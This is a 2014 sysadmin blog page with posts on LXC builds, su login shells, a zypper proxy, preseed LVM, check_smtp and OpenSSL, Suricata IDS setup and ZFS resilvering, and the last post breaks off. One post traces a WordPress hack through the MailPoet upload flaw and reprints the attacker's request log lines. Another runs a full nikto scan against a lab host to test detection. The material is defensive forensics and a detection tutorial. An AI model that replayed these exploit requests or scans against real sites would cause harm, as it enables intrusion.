
Install LXC from source on Ubuntu 14.04 Trusty
Wednesday - Nov 26th 2014 - by - (0 comments)

For debugging or testing new upstream versions of LXC, it is handy to install LXC from source and overwrite (if it exists) an LXC version installed through apt.

The following steps explain how to compile and install LXC from source on Ubuntu 14.04 LTS, using the same directory paths as an installation through the package.

Clone the git repository or download the current zip of the master branch:

git clone https://github.com/lxc/lxc.git

or

wget https://github.com/lxc/lxc/archive/master.zip; unzip master.zip

Install required packages to build LXC:

apt-get install build-essential automake autoconf pkg-config docbook2x libapparmor-dev libselinux1-dev libcgmanager-dev libpython3-dev python3-dev libcap-dev

Change into the cloned or unzipped repository and compile:

if [ -d lxc ]; then cd lxc; elif [ -d lxc-master ]; then cd lxc-master; fi

./autogen.sh

./configure --prefix=/usr --libdir=/usr/lib/x86_64-linux-gnu --libexecdir=/usr/lib/x86_64-linux-gnu --with-rootfs-path=/usr/lib/x86_64-linux-gnu/lxc --sysconfdir=/etc --localstatedir=/var --with-config-path=/var/lib/lxc --enable-python --enable-doc --disable-rpath --enable-apparmor --enable-selinux --disable-lua --enable-tests --enable-cgmanager --enable-capabilities --with-distro=ubuntu

make; make install

You can then verify that the lxc binaries are linked against the new version (as of today the current version in master is 1.1.0-alpha2):

ldd /usr/bin/lxc-start | grep liblxc
        liblxc.so.1 => /usr/lib/x86_64-linux-gnu/liblxc.so.1 (0x00007f2c9e58b000)

ll /usr/lib/x86_64-linux-gnu/liblxc.so.1
lrwxrwxrwx 1 root root 22 Nov 26 13:31 /usr/lib/x86_64-linux-gnu/liblxc.so.1 -> liblxc.so.1.1.0.alpha2
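If you verify this on several hosts, the ldd check can be wrapped into a tiny helper that just extracts the resolved library path (a sketch; the function name is my own):

```shell
# Print the resolved path of a library from "ldd" output read on stdin.
# Usage: ldd /usr/bin/lxc-start | lib_path liblxc
lib_path() {
    awk -v lib="$1" '$1 ~ lib { print $3 }'
}
```

The awk match on the first field keeps the output to just the path, which is easier to compare across machines than the full ldd line.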


 

Permission denied error on /root/.bash_profile when running su command
Tuesday - Nov 25th 2014 - by - (0 comments)

On an Ubuntu 14 server I recently saw a strange error on stdout when I tried to launch a command as another user through "su -":

su - toto -m -c "/srv/tomcat/toto/bin/startup.sh"
-su: /root/.bash_profile: Permission denied
Using CATALINA_BASE:   /srv/tomcat/toto
Using CATALINA_HOME:   /srv/tomcat
Using CATALINA_TMPDIR: /srv/tomcat/toto/temp
Using JRE_HOME:        /srv/java
Using CLASSPATH:       /srv/tomcat/bin/bootstrap.jar:/srv/tomcat/bin/tomcat-juli.jar
Tomcat started.

Although the command worked and was executed successfully, I was wondering about the permission denied error on /root/.bash_profile. To fully (or even partly) understand how bash handles the different types of shells, take a look at "man bash" and search for INVOCATION. It is all written there in black on white (or white on black in a standard console) - unfortunately not very clearly though. Luckily I found the following graphic a while ago, which explains which type of shell loads which files (a printed copy is hanging behind me in my office, by the way).

Bash Login loaded files

Source: http://www.solipsys.co.uk/new/BashInitialisationFiles.html 

Because root's environment is preserved through the -m parameter (preserve environment), $HOME still points to /root. And because "su -" starts a login shell, bash first tries to read /etc/profile and then /root/.bash_profile. But because the toto user cannot access /root/.bash_profile, the permission denied error appears.
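This behaviour can be reproduced without touching /root at all, using a throwaway HOME directory (a sketch; the MARKER variable is just an illustration):

```shell
# Create a disposable HOME containing a .bash_profile, then compare shell types.
demo=$(mktemp -d)
echo 'export MARKER=profile-was-read' > "$demo/.bash_profile"

# Login shell (--login): reads /etc/profile and then $HOME/.bash_profile
HOME=$demo bash --login -c 'echo "login shell sees: $MARKER"'

# Non-login, non-interactive shell: reads neither file, so MARKER stays empty
HOME=$demo bash -c 'echo "non-login shell sees: $MARKER"'

rm -r "$demo"
```

The login shell prints the marker, the plain shell does not - exactly the difference between "su -" and "su".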

If the /root folder were readable by the toto user, the same command would work without any permission denied error:

chmod 755 /root
su - toto -m -c "/srv/tomcat/toto/bin/shutdown.sh"
Using CATALINA_BASE:   /srv/tomcat/toto
Using CATALINA_HOME:   /srv/tomcat
Using CATALINA_TMPDIR: /srv/tomcat/toto/temp
Using JRE_HOME:        /srv/java
Using CLASSPATH:       /srv/tomcat/bin/bootstrap.jar:/srv/tomcat/bin/tomcat-juli.jar

But granting everyone read access to /root is a bad idea. There are better alternatives.
su can also be launched without a login shell (without the dash after su):

su toto -m -c "/srv/tomcat/toto/bin/startup.sh"
Using CATALINA_BASE:   /srv/tomcat/toto
Using CATALINA_HOME:   /srv/tomcat
Using CATALINA_TMPDIR: /srv/tomcat/toto/temp
Using JRE_HOME:        /srv/java
Using CLASSPATH:       /srv/tomcat/bin/bootstrap.jar:/srv/tomcat/bin/tomcat-juli.jar
Tomcat started.

When the same command is launched without a login shell, bash only reads the file named in $BASH_ENV (if set) from the current session (root's), without trying to load any startup files from /root. Hence no permission denied error.

 

How to use openSUSE zypper behind a proxy (with authentication)
Monday - Nov 10th 2014 - by - (0 comments)

I was trying to figure out how to use "zypper" behind an HTTP proxy which requires authentication. Because direct Internet access was blocked, an installation through zypper failed with this message:

geeko:~ # zypper se vnc
Download (curl) error for 'http://dl.google.com/linux/talkplugin/rpm/stable/x86_64/repodata/repomd.xml':
Error code: Connection failed

Turns out it's actually pretty easy - once you know how to do it.
In openSUSE there is a global proxy configuration file, /etc/sysconfig/proxy, which can be edited to your needs. For example:

HTTP_PROXY="myproxy.example.com:8080"

This works fine if you don't require authentication to go through the proxy. But if you need authentication, zypper will still fail:

geeko:~ # zypper se vnc
Download (curl) error for 'http://dl.google.com/linux/talkplugin/rpm/stable/x86_64/repodata/repomd.xml':
Error code: HTTP response: 407
Error message: The requested URL returned error: 407 Proxy Authorization Required

Abort, retry, ignore? [a/r/i/? shows all options] (a): a

For authentication, the same file (/etc/sysconfig/proxy) is used. The user name and password can be entered in the HTTP_PROXY definition:

HTTP_PROXY="http://myusername:mypassword@myproxy.example.com:8080"

And voilà, zypper can now be launched right away (without having to log in again):

geeko:~ # zypper se vnc
Loading repository data...
Reading installed packages...
[...]

In addition to this, there is also a helpful proxy exception definition which can be configured in /etc/sysconfig/proxy:

NO_PROXY="localhost, 127.0.0.1, 10.0.0.0/8, 192.168.0.0/16"

This also applies to SLES (SuSE Linux Enterprise Server) and SLED (SuSE Linux Enterprise Desktop), see http://www.novell.com/support/kb/doc.php?id=7006845.
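Since zypper downloads through curl (as the error message shows), the proxy can alternatively be supplied as environment variables for a one-off shell session, without editing /etc/sysconfig/proxy at all (a sketch with the same placeholder credentials; lowercase http_proxy is the variable libcurl-based tools commonly honour):

```shell
# Valid for the current shell session only:
export HTTP_PROXY="http://myusername:mypassword@myproxy.example.com:8080"
export http_proxy="$HTTP_PROXY"
# zypper se vnc   # would now go through the proxy
```

This is handy for testing proxy credentials before committing them to the config file.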

 

Wordpress hacked through vulnerability in Wysija (Mail Poet)
Sunday - Nov 9th 2014 - by - (0 comments)

A few days ago I discovered a hacked website which was sending out thousands of spam mails. As I always (or mostly) do, I tried to find the entry point of the hack. Usually that doesn't deserve a new blog entry, but in this case I had to follow the traces back several months - which is rare.

It all started with tons of spams being sent out. I was able to pin it down to a php script:

mail() on [/var/www/customer/html/wordpress/wp-content/uploads/wysija/bookmarks/small/02/options.php:1]: To: my@hotmai.com -- Headers: From: "Ebony Beasley" <ebony_beasley@example.com>  Reply-To:"Ebony Beasley" <ebony_beasley@example.com>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit

This file was uploaded on November 6th:

-rw-r--r-- 1 www-data www-data 64680 Nov  6 22:33 /var/www/customer/html/wp-content/uploads/wysija/bookmarks/small/02/options.php

To upload the file, another file was used:

64.90.54.5 - - [06/Nov/2014:22:33:12 +0100] "POST /wordpress/wp-content/themes/Chameleon/sidebar.php HTTP/1.1" 200 207 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

-rwxrwxrwx 1 customer www-data 13928 Oct  7 19:17 /var/www/customer/html/wordpress/wp-content/themes/Chameleon/sidebar.php

... and this file in turn was uploaded by yet another one:

93.103.21.231 - - [07/Oct/2014:19:17:06 +0200] "POST /wordpress/wp-content/uploads/wysija/themes/mailp/index.php?cookie=1 HTTP/1.0" 200 13 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"

-rw-r--r-- 1 www-data www-data 14155 Aug 25 22:18 /var/www/customer/html/wordpress/wp-content/uploads/wysija/themes/mailp/index.php

Now we are back in August, and this is where the real hack happened. To upload the file "index.php", a security vulnerability in the MailPoet (wysija) plugin was exploited:

77.79.40.195 - - [25/Aug/2014:07:59:55 +0200] "POST /wordpress/wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.0" 302 - "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:07:59:57 +0200] "GET /wordpress/wp-content/uploads/wysija/themes/mailp/index.php HTTP/1.1" 200 12 "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:19:58:56 +0200] "POST /wordpress/wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.0" 302 - "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:19:59:01 +0200] "GET /wordpress/wp-content/uploads/wysija/themes/mailp/index.php HTTP/1.1" 200 12 "http://www.example.com/wordpress/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
77.79.40.195 - - [25/Aug/2014:22:18:13 +0200] "POST /wordpress/wp-content/uploads/wysija/themes/mailp/index.php HTTP/1.0" 200 12 "-" "Mozilla/5.0 (Windows)"
77.79.40.195 - - [25/Aug/2014:22:18:14 +0200] "GET /wordpress/wp-content/uploads/wysija/themes/mailp/index.php?cookie=1 HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows)"

This security vulnerability had been disclosed by Sucuri just a month earlier, in July (http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html).

There would have been two simple ways to prevent the hack:

1) Additional authentication on the wp-admin folder, for example a simple http basic authentication
2) Regularly update WordPress and all plugins/themes (the vulnerability was published in July and the hack happened at the end of August, so there was enough time to update)
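The pattern in this incident - executable PHP dropped into wp-content/uploads - is common, so a periodic check for it is cheap (a sketch; the function name is mine, the path in the example is the default WordPress layout):

```shell
# Any PHP file below a WordPress uploads directory is suspicious:
# uploads should only contain media files.
suspicious_php() {
    find "$1" -type f -name '*.php'
}

# Example:
# suspicious_php /var/www/customer/html/wordpress/wp-content/uploads
```

Run from cron and mailed to the admin, this would have caught options.php months earlier.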

 

Using preseed to create two volume groups on same disk
Wednesday - Oct 22nd 2014 - by - (0 comments)

The following preseed partman recipe creates two volume groups on the same disk (/dev/sda):

d-i partman-auto/disk string /dev/sda
d-i partman-auto/method string lvm
d-i partman-auto/choose_recipe select mypartitioning

d-i partman-auto/expert_recipe string \
      mypartitioning :: \
              512 512 512 ext2                                \
                      $primary{ }                             \
                      $bootable{ }                            \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext2 }    \
                      label{ boot }                           \
                      mountpoint{ /boot }                     \
              . \
              122880 122880 122880 ext4                       \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda2 }                     \
                      vg_name{ vg1 }                          \
              . \
              122880 1000000000 1000000000 ext4               \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda3 }                     \
                      vg_name{ vg2 }                          \
              . \
              8192 8192 8192 linux-swap                       \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ swap }                         \
                      method{ swap } format{ }                \
              . \
              10240 10240 10240 ext4                          \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ root }                         \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ root }                           \
                      mountpoint{ / }                         \
              . \
              8192 8192 8192 ext4                             \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ var }                          \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ var }                            \
                      mountpoint{ /var }                      \
              .

This will create:

  • a primary partition with a size of ~500MB (the final OS reports it as 473MB), mounted on /boot
  • another primary partition with a size of ~122GB (final OS: 114GB), used as PV for the volume group vg1
  • another primary partition with a minimum size of ~122GB and a maximum size large enough to fill the rest of the disk, used as PV for the volume group vg2
  • a swap partition with a size of 8GB as LV "swap" in the volume group vg1
  • a root (/) partition with a size of 10GB as LV "root" in the volume group vg1
  • a /var partition with a size of 8GB as LV "var" in the volume group vg1
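For reference, the three numbers at the start of each recipe entry are partman-auto's minimal size, priority and maximal size (all in MB); the priority controls how leftover space is distributed among partitions, which is why the vg2 entry uses a huge value to soak up the rest of the disk. Schematically (my annotation, not preseed syntax):

```
<minimal size MB>  <priority>   <maximal size MB>  <filesystem>
     122880        1000000000      1000000000      ext4        <- vg2 PV: min ~120GB, grows to fill the disk
       8192           8192            8192         linux-swap  <- equal values pin a fixed 8GB size
```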


 

Using Nagios check_smtp -S without SSLv3 (sslv3 alert handshake failure)
Tuesday - Oct 21st 2014 - by - (0 comments)

The recently discovered CVE-2014-3566 (nicknamed POODLE) has caused a lot of configuration effort across the whole Internet. After 18 years in service (SSLv3 was published in 1996!), SSLv3 suddenly needed to be disabled everywhere.

While on the HTTP side most browsers have been using TLS for a long time, the story is different for the SMTP protocol. A typical example is the Nagios plugin check_smtp, which can be used with the parameter "-S" to check a mail server with STARTTLS.

After disabling SSLv3 on the remote mail server, Nagios went wild and reported an alert (CRITICAL - Cannot make SSL connection).
When running the plugin manually, more information is shown:

./check_smtp -H mailserver.example.com -S
CRITICAL - Cannot make SSL connection.
140449663530656:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:
CRITICAL - Cannot create SSL context.

It looks like check_smtp wants to use SSLv3, no matter what (hence the "sslv3 alert handshake failure").

Before you think "Oh! My Nagios plugins are old. That must be it!" - BUZZ! Nope, it doesn't matter whether you are using nagios-plugins 1.4.16 or the newest 2.0.3 (believe me, I've tried both).
The reason lies in OpenSSL, which is used in the background by check_smtp:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
139976003229344:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:

The error looks familiar, doesn't it? So let's check out the openssl version:

openssl version
OpenSSL 1.0.1 14 Mar 2012

Ugh. That's quite old, given all the OpenSSL hiccups in the past year. Let's check the OS:

cat /etc/issue.net
Ubuntu 12.04.5 LTS

OK. To be honest: I expected a more recent version on an Ubuntu LTS - although it's not the newest LTS.

Let's compare this to a Debian Wheezy.

cat /etc/issue.net
Debian GNU/Linux 7

openssl version
OpenSSL 1.0.1e 11 Feb 2013

That looks newer. Wow, Debian is newer! (insider joke :) )

Let's do the same tests as before:

./check_smtp --help
check_smtp v1.4.16 (nagios-plugins 1.4.16)

./check_smtp -H mailserver.example.com -S
SMTP OK - 0.360 sec. response time|time=0.359723s;;;0.000000

Here it works - simply because this openssl is able to connect to the remote mail server without using SSLv3:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
depth=1 C = US, O = "GeoTrust, Inc.", CN = RapidSSL CA
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
 0 s:/serialNumber=XXXXXXXXXXXX/OU=GT12345678/OU=See www.rapidssl.com/resources/cps (c)14/OU=Domain Control Validated - RapidSSL(R)/CN=mailserver.example.com
   i:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
 1 s:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
   i:/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]

So before you blame your monitoring plugins, make sure your openssl version is able to handle TLS.
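If you manage a mixed fleet, a small version guard helps to spot hosts whose OpenSSL is too old before Nagios does (a sketch; the function name and the 1.0.1e threshold are my own choice, and it relies on GNU sort -V):

```shell
# Succeeds if an "openssl version" string is at least the required version.
# Usage: openssl_at_least "$(openssl version)" 1.0.1e
openssl_at_least() {
    ver=$(printf '%s\n' "$1" | awk '{print $2}')
    # sort -V orders versions; the threshold must not sort after our version
    first=$(printf '%s\n%s\n' "$ver" "$2" | sort -V | head -n1)
    [ "$first" = "$2" ]
}
```

Run against the Ubuntu 12.04 box above it fails; against the Wheezy box it passes.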

 

Network Intrusion Detection System with Suricata on Debian Wheezy
Wednesday - Oct 8th 2014 - by - (2 comments)

Suricata is a network intrusion detection system (NIDS) which aims to become the "next Snort", the de facto standard among NIDS. Both Suricata and Snort are rule-based, and their rules are compatible with each other.

On Debian Wheezy there's the following package available in the repository:

root@debian-wheezy:~# apt-cache show suricata
Package: suricata
Version: 1.2.1-2
Installed-Size: 3809
Maintainer: Pierre Chifflier
Architecture: amd64
Depends: libc6 (>= 2.4), libcap-ng0, libgcrypt11 (>= 1.4.5), libgnutls26 (>= 2.12.17-0), libhtp1 (>= 0.2.6), libmagic1, libnet1 (>= 1.1.2.1), libnetfilter-queue1 (>= 0.0.15), libnfnetlink0 (>= 1.0.0), libpcap0.8 (>= 1.0.0), libpcre3 (>= 8.10), libprelude2, libyaml-0-2
Recommends: oinkmaster, snort-rules-default
Description-en: Next Generation Intrusion Detection and Prevention Tool
 Suricata is a network Intrusion Detection System (IDS). It is based on
 rules (and is fully compatible with snort rules) to detect a variety of
 attacks / probes by searching packet content.

However there are two big downsides with this package:

1) It is old. In the Wheezy repo Suricata is at version 1.2.1, while the sources of 2.0.4 were released in September.
2) It doesn't work. I don't know if I did something wrong, but I installed the package on two freshly installed virtual machines and nothing was ever logged. Not even local attacks simulated with nikto.

When I installed Suricata with the latest source package, it immediately started to work. That's why this article is about running Suricata from source.

1) Install pre-requirements
The following packages are enough to compile Suricata on a minimal Debian Wheezy.

apt-get install build-essential pkg-config libpcre3 libpcre3-dbg libpcre3-dev libyaml-0-2 libyaml-dev \
autoconf automake libtool libpcap-dev libnet1-dev zlib1g zlib1g-dev libmagic-dev libcap-ng-dev \
libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0

2) Download and unpack
Download the newest release (at the time of this writing this was 2.0.4) and unpack it.

cd /root/src; wget http://www.openinfosecfoundation.org/download/suricata-2.0.4.tar.gz
tar -xzf suricata-2.0.4.tar.gz; cd suricata-2.0.4

3) Compile
A little side note for the compile step: if you want to use Suricata as both IDS (Intrusion Detection System) AND IPS (Intrusion Prevention System), you must pass "--enable-nfqueue" as a configure option. You can also compile with this option just to be IPS-ready; the final switch has to be done in the configuration file anyway.
With the following configure line, the program will use the following folders:

/usr/bin: For the executable binary (/usr/bin/suricata)
/etc/suricata: Config files (most importantly suricata.yaml)
/etc/suricata/rules: Rule files
/var/log/suricata: Log files
/var/run/suricata: pid file

./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var

The output at the end is the following:

Generic build parameters:
  Installation prefix (--prefix):          /usr
  Configuration directory (--sysconfdir):  /etc/suricata/
  Log directory (--localstatedir) :        /var/log/suricata/

  Host:                                    x86_64-unknown-linux-gnu
  GCC binary:                              gcc
  GCC Protect enabled:                     no
  GCC march native enabled:                yes
  GCC Profile enabled:                     no

To build and install run 'make' and 'make install'.

You can run 'make install-conf' if you want to install initial configuration
files to /etc/suricata/. Running 'make install-full' will install configuration
and rules and provide you a ready-to-run suricata.

To install Suricata into /usr/bin/suricata, have the config in
/etc/suricata and use /var/log/suricata as log dir, use:
./configure --prefix=/usr/ --sysconfdir=/etc/ --localstatedir=/var/

Then run make followed by make install-full, which downloads additional emerging rules right into /etc/suricata/rules (thanks!):

make
make install-full

/usr/bin/wget -qO - http://rules.emergingthreats.net/open/suricata-2.0/emerging.rules.tar.gz | tar -x -z -C "/etc/suricata/" -f -

You can now start suricata by running as root something like '/usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

If a library like libhtp.so is not found, you can run suricata with:
'LD_LIBRARY_PATH=/usr/lib /usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

While rules are installed now, it's highly recommended to use a rule manager for maintaining rules.
The two most common are Oinkmaster and Pulledpork. For a guide see:
https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Rule_Management_with_Oinkmaster

4) Adapt the configuration
The configuration file is, as mentioned above, /etc/suricata/suricata.yaml. The file is in YAML format ("YAML Ain't Markup Language"); just edit it with your favorite editor (mine is vim).
I suggest you go through the config file from top to bottom to learn as much as possible and to adapt the configuration to your environment, but the following are the settings I changed. Note that I didn't activate IPS with these config changes.

Disable console logging and log to file instead:

  # Define your logging outputs.  If none are defined, or they are all
  # disabled you will get the default - console output.
  outputs:
  - console:
      enabled: no
  - file:
      enabled: yes
      filename: /var/log/suricata/suricata.log

Define your HOME_NET (the private LAN your machine is connected to):

  # Holds the address group vars that would be passed in a Signature.
  # These would be retrieved during the Signature address parsing stage.
  address-groups:

    HOME_NET: "[192.168.112.0/24]"

Adapt the host-os-policy and set your machine's IP address next to the policy (yes, Debian is a Linux distro, duh!):

# Host specific policies for defragmentation and TCP stream
# reassembly.  The host OS lookup is done using a radix tree, just
# like a routing table so the most specific entry matches.
host-os-policy:
  # Make the default policy windows.
  windows: []
  bsd: []
  bsd-right: []
  old-linux: []
  linux: [192.168.112.136]
  old-solaris: []
  solaris: []
  hpux10: []
  hpux11: []
  irix: []
  macos: []
  vista: []
  windows2k3: []

Set the paths to the classification and reference config files correctly (they are now located in the rules folder):

classification-file: /etc/suricata/rules/classification.config
reference-config-file: /etc/suricata/rules/reference.config

5) Start Suricata
Now let's start Suricata in daemon mode (-D) and see what happens... (that's exciting!)

suricata -c /etc/suricata/suricata.yaml -i eth0 -D

Suricata immediately starts to write log files into /var/log/suricata:

ls -ltr
total 360
drwxr-xr-x 2 root root   4096 Oct  8 21:49 files
drwxr-xr-x 2 root root   4096 Oct  8 21:49 certs
-rw-r----- 1 root root      0 Oct  8 21:52 http.log
-rw-r--r-- 1 root root    545 Oct  8 21:52 suricata.log
-rw-r--r-- 1 root root   3998 Oct  8 21:52 stats.log
-rw-r----- 1 root root 233626 Oct  8 21:52 unified2.alert.1412797965
-rw-r----- 1 root root 111321 Oct  8 21:52 fast.log

These logs are very important and can be simply explained:

http.log: Logs traffic/attacks to a local web server
suricata.log: The program's log file (which we have defined in the configuration file)
stats.log: Continued logging of statistics
unified2.alert.TIMESTAMP: The alerts are logged into this file in barnyard2 (by2) format
fast.log: Clear text logging of alerts

Now the unified2.alert log file is very interesting. In combination with barnyard2 (https://github.com/firnsy/barnyard2) the alerts can be read and stored in an external place, for example syslog or a database. I might follow up on this with a dedicated article...

6) Test an attack
I mentioned "nikto" above, which can be used to test-attack a web server. Let's do this and see how Suricata reacts:

root@attacker:~/nikto-master/program# ./nikto.pl -h 192.168.112.136 -C all

Holy sh!t... I'll only post the last few lines of the output:

tail /var/log/suricata/http.log
10/08/2014-22:29:20.464061 192.168.112.136 [**] /solr/admin/ [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006808) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.466145 192.168.112.136 [**] /html/vergessen.html [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006809) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.468097 192.168.112.136 [**] /typo3/install/index.php [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006810) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.470129 192.168.112.136 [**] /dnnLogin.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006811) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.474056 192.168.112.136 [**] /dnn/Login.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006812) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.476151 192.168.112.136 [**] /tabid/400999900/ctl/Login/portalid/699996/Default.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006813) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.478121 192.168.112.136 [**] /Portals/_default/Cache/ReadMe.txt [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006814) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.480445 192.168.112.136 [**] /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006816) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.483119 192.168.112.136 [**] /typo3_src/ChangeLog [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006817) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.487481 192.168.112.136 [**] /_about [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006818) [**] 192.168.112.133:41243 -> 192.168.112.136:80

In total Suricata discovered and logged more than 20'000 attacks:

cat /var/log/suricata/http.log  | grep -c Nikto
22475

In the fast.log, far fewer entries are logged:

tail /var/log/suricata/fast.log
10/08/2014-22:28:28.744886  [**] [1:2221028:1] SURICATA HTTP Host header invalid [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:40924 -> 192.168.112.136:80
10/08/2014-22:28:45.976806  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41028 -> 192.168.112.136:80
10/08/2014-22:29:07.430596  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.432698  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.435637  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.438709  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:11.417867  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 CF F6 6D 00 0C 29 3D 0D 45 08 00 45 00 0B 84 8B 5D 40 00 40 06 41 B8 C0 A8 70 85 C0 A8 ]
10/08/2014-22:29:12.076980  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 3D 0D 45 00 0C 29 CF F6 6D 08 00 45 00 11 2C CE AB 40 00 40 06 F8 C1 C0 A8 70 88 C0 A8 ]
10/08/2014-22:29:19.187059  [**] [1:2221007:1] SURICATA HTTP invalid content length field in request [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:41235 -> 192.168.112.136:80
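To get an overview of what fired, the fast.log entries can be aggregated by signature name (a sketch; the field splitting assumes the fast.log format shown above, and the function name is mine):

```shell
# Summarise fast.log alerts as "count  signature", most frequent first.
# Usage: summarise_alerts < /var/log/suricata/fast.log
summarise_alerts() {
    awk -F '\\[\\*\\*\\] ' '
        NF >= 3 {
            sig = $2
            sub(/^\[[0-9:]+\] /, "", sig)   # strip the [gid:sid:rev] prefix
            count[sig]++
        }
        END { for (s in count) printf "%6d  %s\n", count[s], s }
    ' | sort -rn
}
```

This gives a quick ranking of signatures, which is useful before setting up barnyard2.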

So this is how you get a new Suricata version installed quickly and painlessly on a Debian Wheezy. Enjoy.

 

ZFS is still resilvering when 100% done
Tuesday - Oct 7th 2014 - by - (1 comments)

On a Solaris 10 server I needed to replace a disk in a ZFS pool by using a spare drive:

zpool replace mypool c4t69d0 c5t65d0

ZFS then began to resilver the drive:

zpool status                          
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
 scrub: resilver in progress for 0h0m, 0.00% done, 199h10m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  16.6M resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

After almost 11 hours, the scrub line reported 100.00% done, but the status was still resilvering:

 zpool status
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
